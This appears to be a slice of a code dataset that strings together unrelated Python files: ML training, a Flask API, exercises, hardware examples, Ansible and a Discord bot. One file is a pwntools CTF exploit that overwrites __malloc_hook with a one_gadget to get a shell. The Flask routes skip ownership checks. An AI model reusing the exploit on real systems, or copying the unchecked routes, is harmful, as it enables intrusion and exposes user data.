history_loss_train_b.append(temp_loss_train_b)\n history_loss_train_c.append(temp_loss_train_c)\n\n # Test data\n rand_index = np.random.choice(len(images_test_1), size = batch_size)\n x_batch_1 = images_test_1[rand_index]\n y_batch_1 = labels_test_1[rand_index]\n\n rand_index = np.random.choice(len(images_test_t), size = batch_size)\n x_batch_t = images_test_t[rand_index]\n y_batch_t = labels_test_t[rand_index]\n\n feed_dict = {x_1: x_batch_1, y_1: y_batch_1, x_t: x_batch_t, y_t: y_batch_t, keep_prob: 0.8} #0.8\n\n temp_loss_test_1_1 = sess.run(loss_1_1, feed_dict = feed_dict)\n temp_loss_test_1_t = sess.run(loss_1_t, feed_dict = feed_dict)\n temp_loss_test_2_1 = sess.run(loss_2_1, feed_dict = feed_dict)\n temp_loss_test_2_t = sess.run(loss_2_t, feed_dict = feed_dict)\n\n temp_acc_test_1_1 = sess.run(acc_1_1, feed_dict = feed_dict)\n temp_acc_test_1_t = sess.run(acc_1_t, feed_dict = feed_dict)\n temp_acc_test_2_1 = sess.run(acc_2_1, feed_dict = feed_dict)\n temp_acc_test_2_t = sess.run(acc_2_t, feed_dict = feed_dict)\n\n history_loss_test_1_1.append(temp_loss_test_1_1)\n history_loss_test_1_t.append(temp_loss_test_1_t)\n history_loss_test_2_1.append(temp_loss_test_2_1)\n history_loss_test_2_t.append(temp_loss_test_2_t)\n\n history_acc_test_1_1.append(temp_acc_test_1_1)\n history_acc_test_1_t.append(temp_acc_test_1_t)\n history_acc_test_2_1.append(temp_acc_test_2_1)\n history_acc_test_2_t.append(temp_acc_test_2_t)\n\n temp_loss_test_a = sess.run(loss_a, feed_dict = feed_dict)\n temp_loss_test_b = sess.run(loss_b, feed_dict = feed_dict)\n temp_loss_test_c = sess.run(loss_c, feed_dict = feed_dict)\n\n history_loss_test_a.append(temp_loss_test_a)\n history_loss_test_b.append(temp_loss_test_b)\n history_loss_test_c.append(temp_loss_test_c)\n \"\"\"\n \n if i % show_step == 0:\n show_numbers += 1\n print ('-' * 15)\n # do validation\n # Accurancy\n acc_source_test1 = 0\n acc_source_test2 = 0\n acc_target_test1 = 0\n acc_target_test2 = 0\n \n acc_source_train1 = 0\n acc_source_train2 = 0\n acc_target_train1 = 0\n acc_target_train2 = 0\n # Loss\n loss_test_a = 0\n loss_test_b = 0\n loss_test_c = 0\n \n for acc_n in range(n_iter):\n #test\n \n x_train_batch, y_train_batch = next(test_source_batch)\n x_target_batch, y_target_batch = next(test_target_batch)\n \n feed_test_dict = {x_1: x_train_batch, y_1: y_train_batch, \n x_t: x_target_batch, y_t: y_target_batch, keep_prob: 0.8} #0.8\n \n acc_source_test1 += sess.run(acc_1_1, feed_dict=feed_test_dict)\n acc_source_test2 += sess.run(acc_2_1, feed_dict=feed_test_dict)\n acc_target_test1 += sess.run(acc_1_t, feed_dict=feed_test_dict)\n acc_target_test2 += sess.run(acc_2_t, feed_dict=feed_test_dict)\n \n loss_test_a += sess.run(loss_a, feed_dict = feed_test_dict)\n loss_test_b += sess.run(loss_b, feed_dict = feed_test_dict)\n loss_test_c += sess.run(loss_c, feed_dict = feed_test_dict)\n \n #train\n x_train_batch, y_train_batch = next(get_source_batch)\n x_target_batch, y_target_batch = next(get_target_batch)\n \n feed_test_dict = {x_1: x_train_batch, y_1: y_train_batch, \n x_t: x_target_batch, y_t: y_target_batch, keep_prob: 0.5} #0.8\n \n acc_source_train1 += sess.run(acc_1_1, feed_dict=feed_test_dict)\n acc_source_train2 += sess.run(acc_2_1, feed_dict=feed_test_dict)\n acc_target_train1 += sess.run(acc_1_t, feed_dict=feed_test_dict)\n acc_target_train2 += sess.run(acc_2_t, feed_dict=feed_test_dict)\n \n acc_source_test1 /= n_iter\n acc_source_test2 /= n_iter\n acc_target_test1 /= n_iter\n acc_target_test2 /= n_iter\n \n acc_source_train1 /= n_iter\n acc_source_train2 /= n_iter\n acc_target_train1 /= n_iter\n acc_target_train2 /= n_iter\n \n source_acc_test1.append(acc_source_test1) \n source_acc_test2.append(acc_source_test2)\n target_acc_test1.append(acc_target_test1)\n target_acc_test2.append(acc_target_test2)\n \n source_acc_train1.append(acc_source_train1)\n source_acc_train2.append(acc_source_train2)\n target_acc_train1.append(acc_target_train1)\n target_acc_train2.append(acc_target_train2)\n\n\n loss_test_a /= n_iter\n loss_test_b /= n_iter\n loss_test_c /= n_iter\n \n \n \"\"\"\n if verbose:\n print('{}/{} loss: {} validation accuracy : {}%'.format(\n batch_size * (i + 1),\n X_train.shape[0],\n cur_loss,\n valid_acc))\n \n # save the merge result summary\n writer.add_summary(merge_result, iter_total)\n \"\"\"\n print(\"Iteration: {}, Loss_test_a: {}, Loss_test_b: {}, Loss_test_c: {}\".format(iter_total, \n loss_test_a, \n loss_test_b,\n loss_test_c))\n print(\"Source test acc1: {}%, Source test acc2: {}%.\".format(100*acc_source_test1,\n 100*acc_source_test2))\n\n\n # when achieve the best validation accuracy, we store the model paramters\n \n if acc_target_test1 > best_acc_classifier1:\n print('Best test accuracy classifier1! Iteration:{} accuracy: {}%'.format(iter_total,\n 100*acc_target_test1))\n best_acc_classifier1 = acc_target_test1\n if acc_target_test2 > best_acc_classifier2:\n print('Best test accuracy classifier2! Iteration:{} accuracy: {}%'.format(iter_total,\n 100*acc_target_test2))\n best_acc_classifier2 = acc_target_test2\n \n #saver.save(sess, 'model/{}'.format(cur_model_name))\n\n \n #print(\"Traning ends. The best test accuracy is classifier1: {}, classifier2: {}. Model named {}.\".format(best_acc_classifier1, best_acc_classifier1, cur_model_name))\n print(\"Traning ends. The best test accuracy is classifier1: {}%, classifier2: {}%.\".format(100*best_acc_classifier1, 100*best_acc_classifier2))\n\n print ('-'* 15) \n fig = plt.figure(figsize = (10, 3))\n ax1 = fig.add_subplot(1, 2, 1)\n ax1.plot(range(show_numbers), source_acc_train1, 'b-', label = 'Source train acc')\n ax1.plot(range(show_numbers), source_acc_test1, 'r--', label = 'Source test acc')\n ax1.set_title('Classifier1 Acc for Source Data')\n ax1.legend(loc = 'lower right')\n\n ax2 = fig.add_subplot(1, 2, 2)\n ax2.plot(range(show_numbers), target_acc_train1, 'b-', label = 'Target train acc')\n ax2.plot(range(show_numbers), target_acc_test1, 'r--', label = 'Target test acc')\n ax2.set_ylim(0.0, 1.0)\n ax2.set_title('Classifier1 Acc for Target Data')\n ax2.legend(loc = 'lower right')\n\n plt.show()\n\n print ('-'* 15) \n fig = plt.figure(figsize = (10, 3))\n ax1 = fig.add_subplot(1, 2, 1)\n ax1.plot(range(show_numbers), source_acc_train2, 'b-', label = 'Source train acc')\n ax1.plot(range(show_numbers), source_acc_test2, 'r--', label = 'Source test acc')\n ax1.set_title('Classifier2 Acc for Source Data')\n ax1.legend(loc = 'lower right')\n\n ax2 = fig.add_subplot(1, 2, 2)\n ax2.plot(range(show_numbers), target_acc_train2, 'b-', label = 'Target train acc')\n ax2.plot(range(show_numbers), target_acc_test2, 'r--', label = 'Target test acc')\n ax2.set_ylim(0.0, 1.0)\n ax2.set_title('Classifier2 Acc for Target Data')\n ax2.legend(loc = 'lower right')\n\n plt.show()\n\n ","sub_path":"mcd_svhn2mnist.py","file_name":"mcd_svhn2mnist.py","file_ext":"py","file_size_in_byte":26663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"473842270","text":"from flask import Blueprint, request, jsonify\nfrom comic_book.helpers import token_required\nfrom comic_book.models import db, User, Hero, hero_schema, heroes_schema\n\napi = Blueprint('api', __name__, url_prefix = '/api')\n\n@api.route('/getheroes')\n@token_required\ndef get_data(current_user_token):\n return { 'List' : 'Heroes'}\n\n\n# Create Hero\n\n@api.route('/heroes', methods = ['POST'])\n@token_required\ndef create_hero(current_user_token):\n name = request.json['name']\n team = request.json['team']\n league = request.json['league']\n position = request.json['position']\n rating = request.json['rating']\n user_token = current_user_token.token\n\n hero = Hero(name, team, league, position, rating, user_token)\n db.session.add(hero)\n db.session.commit()\n\n response = hero_schema.dump(hero)\n return jsonify(response)\n\n# Retrieve all Heroes\n\n@api.route('/heroes', methods = ['GET'])\n@token_required\ndef get_heroes(current_user_token):\n owner = current_user_token.token\n heroes = Hero.query.filter_by(user_token = owner).all()\n response = heroes_schema.dump(heroes)\n return jsonify(response)\n\n\n# Retrieve a Hero\n\n@api.route('/heroes/', methods = ['GET'])\n@token_required\ndef get_hero(current_user_token, id):\n owner = current_user_token.token\n if owner == current_user_token.token:\n hero = Hero.query.get(id)\n response = hero_schema.dump(hero)\n return jsonify(response)\n else:\n return jsonify({'message' : 'Valid Token Required'}), 401\n\n# Update Hero\n\n@api.route('/heroes/', methods = ['POST', 'PUT'])\n@token_required\ndef update_hero(current_user_token, id):\n hero = Hero.query.get(id) \n\n hero.name = request.json['name']\n hero.team = request.json['team']\n hero.league = request.json['league']\n hero.position = request.json['position']\n hero.rating = request.json['rating']\n hero.user_token = current_user_token.token\n\n db.session.commit()\n response = hero_schema.dump(hero)\n return jsonify(response)\n\n\n# Delete Hero\n\n@api.route('/heroes/', methods = ['DELETE'])\n@token_required\ndef delete_hero(current_user_token, id):\n hero = Hero.query.get(id)\n db.session.delete(hero)\n db.session.commit()\n\n response = hero_schema.dump(hero)\n return jsonify(response)","sub_path":"comic_book/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"373799854","text":"'''Write a function called describe_city() that accepts the name of a city\r\nand its country. The function should print a simple message, such as\r\nReykjavik is in Iceland. Give the paramater for the country a default value.\r\nCall your function for three different cities, at least one that is not\r\nin the default country.'''\r\n\r\ndef describe_city(city, country=\"Spain\"):\r\n\t\tprint(city + \" is in \" + country)\r\n\t\r\ndescribe_city(\"Malaga\")\r\ndescribe_city(\"Granada\")\r\ndescribe_city(\"Asterdam\", \"Holland\")\r\n\r\n","sub_path":"cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"537529536","text":"from pwn import * \nsh = process(\"./popping_caps\") \nlibc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\") \n\ndef get_PIE(proc):\n memory_map = open(\"/proc/{}/maps\".format(proc.pid),\"rb\").readlines()\n return int(memory_map[0].split(\"-\")[0],16)\n\ndef debug(bp):\n #bp = [0xea0,0xd31,0xc52]\n #bp = [0x00000dfb,0x00000b7c,0x00000d10]\n script = \"\"\n PIE = get_PIE(sh)\n PAPA = PIE\n for x in bp:\n script += \"b *0x%x\\n\"%(PIE+x)\n gdb.attach(sh,gdbscript=script) \n\ndef add(size) : \n sh.recv() \n sh.sendline(\"1\") \n sh.recv()\n sh.sendline(str(size)) \n\ndef free(id) : \n sh.recv() \n sh.sendline(\"2\") \n sh.recv() \n sh.sendline(str(id))\n\ndef edit(content) : \n sh.recv() \n sh.sendline(\"3\") \n sh.recv() \n sh.send(content) \n\nsh.recvuntil(\"Here is system \") \nsystem = eval(sh.recv(14)) \n\nlibc.address = system - libc.sym['system']\nmalloc_hook = libc.sym['__malloc_hook']\none_gadget = libc.address + 0x10a38c \n\nlog.success(\"System = \" + hex(system)) \nlog.success(\"Libc = \" + hex(libc.address))\n\n# debug([0xc13, 0xc49, 0xbd5]) \nadd(0x3a8) \nfree(0) # set fake size \nfree(-0x210) # free fake size \nadd(0xF8) \nedit(p64(malloc_hook)) # \nadd(0x18) # dup to malloc hook \nedit(p64(one_gadget)) \n\nsh.interactive()","sub_path":"Pwnable/ctf/csaw/popping_cars.py","file_name":"popping_cars.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"326727120","text":"__author__ = 'shmakovs'\n\nimport subprocess\n\ndef GetStartStopStrand(LineStart, LineStop, OffsetStart, OffsetStop):\n\n if LineStop < LineStart:\n LineStart += OffsetStart\n LineStop -= OffsetStop\n\n return max(1, LineStop), LineStart, \"minus\"\n\n LineStart -= OffsetStart\n LineStop += OffsetStop\n\n return max(1, LineStart), LineStop, \"plus\"\n\ndef GetRRNAPositions(HitsFileName, LengthFileName, OrgToRRNADict):\n RRNALen = 0\n for Line in open(LengthFileName):\n RRNALen = int(Line[:-1].split(\"\\t\")[1])\n\n for Line in open(HitsFileName):\n LineValues = Line[:-1].split(\"\\t\")\n Contig = LineValues[HITS_CONTIG]\n if \"|\" in Contig:\n Contig = Contig.split(\"|\")[1]\n\n OrgID = ContigToOrgDict[Contig]\n if OrgID not in OrgToRRNADict:\n OrgToRRNADict[OrgID] = [0, 0, 0, \"\", \"\"] # Start, Stop, Score, Strand, ContigID\n\n if int(LineValues[HITS_BITSCORE]) > OrgToRRNADict[OrgID][2]:\n Start, Stop, Strand = GetStartStopStrand(int(LineValues[HITS_START]), int(LineValues[HITS_STOP]),\n int(LineValues[HITS_OFFSET_START]), RRNALen - int(LineValues[HITS_OFFSET_STOP]))\n OrgToRRNADict[OrgID] = [Start, Stop, int(LineValues[HITS_BITSCORE]), Strand, Contig]#, LineValues[7]]\n\n return OrgToRRNADict\n\n\nContigToOrgDict = dict()\nfor Line in open(\"OrganismToContig.tsv\"):\n LineValues = Line[:-1].split(\"\\t\")\n ContigToOrgDict[LineValues[1]] = LineValues[0]\n\nHITS_BITSCORE = 10\nHITS_CONTIG = 1\nHITS_START = 3\nHITS_STOP = 4\nHITS_OFFSET_START = 8\nHITS_OFFSET_STOP = 9\n\nOrgToRRNADict = dict()\n\nHitsFileName = \"EcoliRNA.hits_good_0807\"\nLengthFileName = \"EcoliRRNA.len\"\nOrgToRRNADict = GetRRNAPositions(HitsFileName, LengthFileName, OrgToRRNADict)\n\nHitsFileName = \"PyrococcusRRNA.hits_good_0807\"\nLengthFileName = \"PyrococcusRRNA.len\"\nOrgToRRNADict = GetRRNAPositions(HitsFileName, LengthFileName, OrgToRRNADict)\n\ncount = 0\nwith open(\"16sRRNA.fna\", \"a\") as RNAFile:\n for OrgID in OrgToRRNADict:\n count += 1\n print(str(count) + \"\\t\" + \"\\t\".join([str(x) for x in OrgToRRNADict[OrgID]]))\n TmpFileName = \"tmp.fna\"\n subprocess.call(\n \"blastdbcmd -db /panfs/pan1/prokdata/db/all1603.nt -entry \" + OrgToRRNADict[OrgID][4] +\n \" -range \" + str(OrgToRRNADict[OrgID][0]) + \"-\" + str(OrgToRRNADict[OrgID][1]) + \" -strand \" + OrgToRRNADict[OrgID][3] + \" > \" + TmpFileName, shell = True)\n\n for Line in open(TmpFileName):\n if Line[0] == \">\":\n RNAFile.write(\">\" + OrgID + \"\\n\")\n else:\n RNAFile.write(Line)","sub_path":"CRISPRRate/TypeIII/GetFnaSequences.py","file_name":"GetFnaSequences.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"375221532","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nHOST = \"localhost\"\nPORT = 4223\nUID = \"XYZ\" # Change XYZ to the UID of your Multi Touch Bricklet\n\nfrom tinkerforge.ip_connection import IPConnection\nfrom tinkerforge.bricklet_multi_touch import BrickletMultiTouch\n\nif __name__ == \"__main__\":\n ipcon = IPConnection() # Create IP connection\n mt = BrickletMultiTouch(UID, ipcon) # Create device object\n\n ipcon.connect(HOST, PORT) # Connect to brickd\n # Don't use device before ipcon is connected\n\n # Get current touch state\n state = mt.get_touch_state()\n s = \"\"\n\n if state & (1 << 12):\n s += \"In proximity, \"\n\n if (state & 0xfff) == 0:\n s += \"No electrodes touched\"\n else:\n s += \"Electrodes \"\n for i in range(12):\n if state & (1 << i):\n s += str(i) + \" \"\n s += \"touched\"\n\n print(s)\n\n raw_input(\"Press key to exit\\n\") # Use input() in Python 3\n ipcon.disconnect()\n","sub_path":"scripts/tinkerforge_python/examples/bricklet/multi_touch/example_simple.py","file_name":"example_simple.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"178845975","text":"if __name__ == '__main__':\n from pino.ino import Arduino, Comport, PinMode\n from pino.config import Config\n from time import sleep\n\n # com = Comport().set_baudrate(115200) \\\n # .set_port(\"/dev/ttyACM0\") \\\n # .set_inofile(\"$HOME/Experimental/pino/example/proto.ino\") \\\n # .deploy() \\\n # .connect(1.15)\n\n # loop = 10\n # interval = 0.5\n\n config = Config(\"./example/config.yml\")\n com = Comport() \\\n .apply_settings(config.get_comport()) \\\n .deploy() \\\n .connect()\n\n arduino = Arduino(com)\n arduino.set_pinmode(9, PinMode.SERVO)\n\n variables = config.get_experimental()\n loop = variables.get(\"loop\", 10)\n interval = variables.get(\"interval\", 0.5)\n\n for _ in range(loop):\n arduino.servo_rotate(9, 0)\n sleep(interval)\n arduino.servo_rotate(9, 90)\n sleep(interval)\n","sub_path":"example/servo.py","file_name":"servo.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"431810076","text":"\"\"\"\n\"\"\"\nimport collections\nimport operator\nimport os\n\nimport ansible.playbook\nfrom ansible import callbacks as ansible_callbacks\nfrom ansible import utils\n\nfrom . import logging\n\n\nclass PlayBook(object):\n\n @classmethod\n def factory(cls, playbook, inventory=None, stats=None, callbacks=None,\n runner_callbacks=None, check=False, host_list=None,\n limit=None, extra_vars=None, skip_tags=None,\n only_tags=[\"all\"], logger=None):\n \"\"\"\n Create and return an ansible,playbook.PlayBook instance.\n :inventory: Ansible Inventory instance to setup.\n :limit: A dictionary or list of dictionaries limiting the PlayBook.\n Example:\n {\"hostname\": \"server\", \"ip\": \"1.2.3.4\"}\n or\n [{\"hostname\": \"server1\", \"ip\": \"1.2.3.4\"},\n {\"hostname\": \"server2\", \"ip\": \"1.2.3.5\"}]\n :extra_vars: A dictionary of unicode string keys and values that are\n passed as extra variables to the playbook.\n :only_tags: A list of tags to run in the playbook. Defaults to all.\n :skip_tags: A list of tags to skip in the playbook.\n\n Notes: PlayBook is created, but not run. Generally if something isn't\n passed to the factory it'll use similar behavior to the\n ansible-playbook command-line script.\n \"\"\"\n if logger:\n logging.use_logger(logger)\n deps = PlayBook._setup(playbook, inventory, stats, callbacks,\n runner_callbacks, host_list, limit)\n return ansible.playbook.PlayBook(\n playbook=deps.playbook,\n inventory=deps.inventory,\n stats=deps.stats,\n callbacks=deps.callbacks,\n runner_callbacks=deps.runner_callbacks,\n check=check,\n extra_vars=extra_vars,\n only_tags=only_tags,\n skip_tags=skip_tags)\n\n @classmethod\n def _setup(cls, playbook, inventory, stats, callbacks, runner_callbacks,\n host_list, limit):\n \"\"\"\n Setup dependencies for the Ansible PlayBook and return them\n in a namedtuple.\n \"\"\"\n deps = collections.namedtuple(\"Dependencies\",\n [\"playbook\", \"inventory\", \"stats\",\n \"callbacks\", \"runner_callbacks\"])\n deps.playbook = playbook\n if stats is None:\n deps.stats = ansible_callbacks.AggregateStats()\n else:\n deps.stats = stats\n if callbacks is None:\n deps.callbacks = ansible_callbacks.PlaybookCallbacks(\n verbose=utils.VERBOSITY)\n else:\n deps.callbacks = callbacks\n if runner_callbacks is None:\n deps.runner_callbacks = ansible_callbacks.PlaybookRunnerCallbacks(\n stats,\n verbose=utils.VERBOSITY)\n else:\n deps.runner_callbacks = runner_callbacks\n if inventory is None:\n deps.inventory = ansible.inventory.Inventory(host_list=host_list)\n if limit:\n PlayBook._setup_inventory_limit(deps.inventory, limit)\n else:\n deps.inventory = inventory\n return deps\n\n @classmethod\n def _setup_inventory_limit(cls, inventory, limit):\n \"\"\"\n Setup and limit hosts using inventory and limit.\n :inventory: Ansible Inventory instance to setup.\n :limit: A dictionary or list of dictionaries limiting the PlayBook.\n Example:\n {\"hostname\": \"server\", \"ip\": \"1.2.3.4\"}\n or\n [{\"hostname\": \"server1\", \"ip\": \"1.2.3.4\"},\n {\"hostname\": \"server2\", \"ip\": \"1.2.3.5\"}]\n \"\"\"\n if isinstance(limit, dict):\n inventory.subset(limit[\"hostname\"])\n PlayBook._setup_host(inventory, limit)\n elif isinstance(limit, collections.Iterable):\n hostnames = \",\".join([l[\"hostname\"] for l in limit])\n inventory.subset(hostnames)\n for l in limit:\n PlayBook._setup_host(inventory, l)\n\n @classmethod\n def _setup_host(cls, inventory, limit):\n \"\"\"\n Check host and setup variables so limit/subset behaves\n as expected.\n \"\"\"\n host = inventory.get_host(limit[\"hostname\"])\n if host and host.vars:\n host.vars[\"ansible_ssh_host\"] = limit[\"ip\"]\n else:\n raise Exception(\"The host (%s) is not in the \"\n \"Ansible inventory file %s.\" %\n (host, inventory.host_list))\n\n\ndef _get_files(directory):\n files = []\n directories = list(os.walk(directory))\n directories.sort(cmp=operator.lt)\n for d in directories:\n a_dir = d[0]\n files_in_dir = d[2]\n files_in_dir.sort()\n if os.path.isdir(a_dir) and \"playbooks\" in a_dir:\n for f in files_in_dir:\n if os.path.splitext(f)[1] == \".yml\":\n files.append(os.path.join(a_dir, f))\n return files\n\n\ndef get_playbooks(directory, **kwargs):\n \"\"\"\n Walk the Directory structure and return an ordered list of\n playbook objects.\n\n :directory: The directory to walk and search for playbooks.\n :kwargs: The keywords that will be passed to the PlayBook.factory method.\n\n Notes: * Playbook files are identified as ending in .yml\n * Playbooks are created using the same **kwargs.\n * Playbooks are not run.\n * Playbook files use the .yml file extension.\n \"\"\"\n return [PlayBook.factory(pb, **kwargs) for pb in _get_files(directory)]\n","sub_path":"subspace/playbook.py","file_name":"playbook.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"12716653","text":"'''\nAlright, detective, one of our colleagues successfully observed our target person, Robby the robber. \nWe followed him to a secret warehouse, where we assume to find all the stolen stuff. The door to this warehouse is secured by an electronic combination lock. \nUnfortunately our spy isn't sure about the PIN he saw, when Robby entered it.\n\nThe keypad has the following layout:\n\n┌───┬───┬───┐\n│ 1 │ 2 │ 3 │\n├───┼───┼───┤\n│ 4 │ 5 │ 6 │\n├───┼───┼───┤\n│ 7 │ 8 │ 9 │\n└───┼───┼───┘\n │ 0 │\n └───┘\nHe noted the PIN 1357, but he also said, it is possible that each of the digits he saw could actually be another adjacent digit (horizontally or vertically, but not diagonally).\nE.g. instead of the 1 it could also be the 2 or 4. And instead of the 5 it could also be the 2, 4, 6 or 8.\n\nHe also mentioned, he knows this kind of locks. You can enter an unlimited amount of wrong PINs, they never finally lock the system or sound the alarm. \nThat's why we can try out all possible (*) variations.\n\n* possible in sense of: the observed PIN itself and all variations considering the adjacent digits\n\nCan you help us to find all those variations? It would be nice to have a function, that returns an array (or a list in Java and C#) \nof all variations for an observed PIN with a length of 1 to 8 digits.\nWe could name the function getPINs (get_pins in python, GetPINs in C#). \nBut please note that all PINs, the observed one and also the results, must be strings, because of potentially leading '0's. \nWe already prepared some test cases for you.\n\nDetective, we are counting on you!\n'''\n\nimport itertools # allows us to iterate through all combinations of given lists of numbers\n\ndef get_pins(observed): # Creating a dictionary to give list of all the possible values when a single number is pressed.\n PINdict = {'1': ['1','2','4'],\n '2': ['2','1','3','5'],\n '3': ['3','2','6'],\n '4': ['4','1','5','7'],\n '5': ['5','2','4','6','8'],\n '6': ['6','3','5','9'],\n '7': ['7','4','8'],\n '8': ['8','5','7','9','0'],\n '9': ['9','6','8'],\n '0': ['0','8']\n }\n x = [PINdict[i] for i in observed] # Generates a list of the PINdict.value() for each character in observed. i.e. if obs contains '1', list will include ['1', '2', '4'].\n combinations = list(itertools.product(*x)) # Generate list of all combinations of every index in x (*x).\n PINS = [''.join(x) for x in combinations] # Joins strings to make one list of pins.\n return PINS\n","sub_path":"GetPins.py","file_name":"GetPins.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"244695086","text":"import asyncio\nimport pytest\nfrom testing_support.fixtures import (\n dt_enabled,\n validate_transaction_metrics,\n)\nfrom testing_support.validators.validate_span_events import validate_span_events\nfrom newrelic.api.background_task import background_task\n\nfrom test_application import is_graphql_2\n\n\n@pytest.fixture(scope=\"session\")\ndef graphql_run_async():\n from graphql import graphql, __version__ as version\n\n major_version = int(version.split(\".\")[0])\n if major_version == 2:\n\n def graphql_run(*args, **kwargs):\n return graphql(*args, return_promise=True, **kwargs)\n\n return graphql_run\n else:\n return graphql\n\n\n@dt_enabled\ndef test_query_and_mutation_async(app, graphql_run_async, is_graphql_2):\n from graphql import __version__ as version\n\n FRAMEWORK_METRICS = [\n (\"Python/Framework/GraphQL/%s\" % version, 1),\n ]\n _test_mutation_scoped_metrics = [\n (\"GraphQL/resolve/GraphQL/storage\", 1),\n (\"GraphQL/resolve/GraphQL/storage_add\", 1),\n (\"GraphQL/operation/GraphQL/query//storage\", 1),\n (\"GraphQL/operation/GraphQL/mutation//storage_add\", 1),\n ]\n _test_mutation_unscoped_metrics = [\n (\"OtherTransaction/all\", 1),\n (\"GraphQL/all\", 2),\n (\"GraphQL/GraphQL/all\", 2),\n (\"GraphQL/allOther\", 2),\n (\"GraphQL/GraphQL/allOther\", 2),\n ] + _test_mutation_scoped_metrics\n\n _expected_mutation_operation_attributes = {\n \"graphql.operation.type\": \"mutation\",\n \"graphql.operation.name\": \"\",\n }\n _expected_mutation_resolver_attributes = {\n \"graphql.field.name\": \"storage_add\",\n \"graphql.field.parentType\": \"Mutation\",\n \"graphql.field.path\": \"storage_add\",\n \"graphql.field.returnType\": \"[String]\" if is_graphql_2 else \"String\",\n }\n _expected_query_operation_attributes = {\n \"graphql.operation.type\": \"query\",\n \"graphql.operation.name\": \"\",\n }\n _expected_query_resolver_attributes = {\n \"graphql.field.name\": \"storage\",\n \"graphql.field.parentType\": \"Query\",\n \"graphql.field.path\": \"storage\",\n \"graphql.field.returnType\": \"[String]\",\n }\n\n @validate_transaction_metrics(\n \"query//storage\",\n \"GraphQL\",\n scoped_metrics=_test_mutation_scoped_metrics,\n rollup_metrics=_test_mutation_unscoped_metrics + FRAMEWORK_METRICS,\n background_task=True,\n )\n @validate_span_events(exact_agents=_expected_mutation_operation_attributes)\n @validate_span_events(exact_agents=_expected_mutation_resolver_attributes)\n @validate_span_events(exact_agents=_expected_query_operation_attributes)\n @validate_span_events(exact_agents=_expected_query_resolver_attributes)\n @background_task()\n def _test():\n async def coro():\n response = await graphql_run_async(\n app, 'mutation { storage_add(string: \"abc\") }'\n )\n assert not response.errors\n response = await graphql_run_async(app, \"query { storage }\")\n assert not response.errors\n\n # These are separate assertions because pypy stores 'abc' as a unicode string while other Python versions do not\n assert \"storage\" in str(response.data)\n assert \"abc\" in str(response.data)\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(coro())\n\n _test()\n","sub_path":"tests/framework_graphql/test_application_async.py","file_name":"test_application_async.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"404494184","text":"# -*- coding: utf-8 -*-\nimport collections\nimport datetime\nimport json\nimport logging\nimport traceback\n\nimport discord\nimport typing\nfrom discord.ext import commands as commands\n\nfrom cogs.helpers import api\nfrom cogs.helpers import context, checks\nfrom cogs.helpers.cache import Cache\nfrom cogs.helpers.converters import NotStrongEnough, HierarchyError\nfrom cogs.helpers.guild_settings import Settings\n\n\nclass BamboBot(commands.AutoShardedBot):\n def __init__(self, command_prefix: typing.Union[str, typing.Callable[[discord.Message], typing.Awaitable]], base_logger: logging.Logger, logger: logging.Logger, **options):\n super().__init__(command_prefix, **options)\n\n self.cache = Cache(self)\n self.commands_used = collections.Counter()\n self.admins = [381243923131138058]\n self.base_logger, self.logger = base_logger, logger\n\n # Load credentials so they can be used later\n with open(\"credentials.json\", \"r\", encoding='utf-8') as f:\n credentials = json.load(f)\n\n self.token = credentials[\"discord_token\"]\n\n self.uptime = datetime.datetime.utcnow()\n\n self.api = api.Api(self)\n\n self.settings = Settings(self)\n\n async def on_message(self, message):\n if message.author.bot:\n return # ignore messages from other bots\n\n ctx = await self.get_context(message, cls=context.CustomContext)\n if ctx.prefix is not None:\n await self.invoke(ctx)\n\n async def on_command(self, ctx):\n self.commands_used[ctx.command.name] += 1\n ctx.logger.info(f\"<{ctx.command}> {ctx.message.clean_content}\")\n\n async def on_ready(self):\n game = discord.Game(name=f\"b!help | b!urls\")\n await self.change_presence(status=discord.Status.online, activity=game)\n self.logger.info(\"We are all set, on_ready was fired! Yeah!\")\n total_members = len(self.users)\n self.logger.info(f\"I see {len(self.guilds)} guilds, and {total_members} members\")\n\n async def on_command_error(self, context: context.CustomContext, exception):\n # print(f'self -> {self}\\n')\n # print(f'context -> {context}\\n')\n # print(f'exception -> {exception}\\n')\n # print(f'exception -> {''.join(traceback.format_exception(type(exception), exception, exception.__traceback__))}\\n')\n # print(f'exception -> {exception}\\n{''.join(traceback.format_exception(type(exception), exception, exception.__traceback__))}\\n')\n\n if isinstance(exception, discord.ext.commands.errors.CommandNotFound):\n return\n\n context.logger.debug(f\"Error during processing: {exception} ({repr(exception)})\")\n\n if isinstance(exception, discord.ext.commands.errors.MissingRequiredArgument):\n await context.send_to(f\":x: Brakuje wymaganego argumentu.\\nUżycie : `{context.prefix}{context.command.signature}`\", delete_after=60)\n await context.message.delete(delay=60)\n\n return\n elif isinstance(exception, checks.NoPermissionsError):\n await context.send_to(f\":x: Oof, wystąpił problem! \"\n f\"Bot wymaga więcej permisji. Skontaktuj się w ten sprawie z adminstratorem serwera. \"\n f\"Jeżeli jesteś administratorem, wpisz `{context.prefix}bot_permissions_check` aby zobaczyć brakkujące permisje. 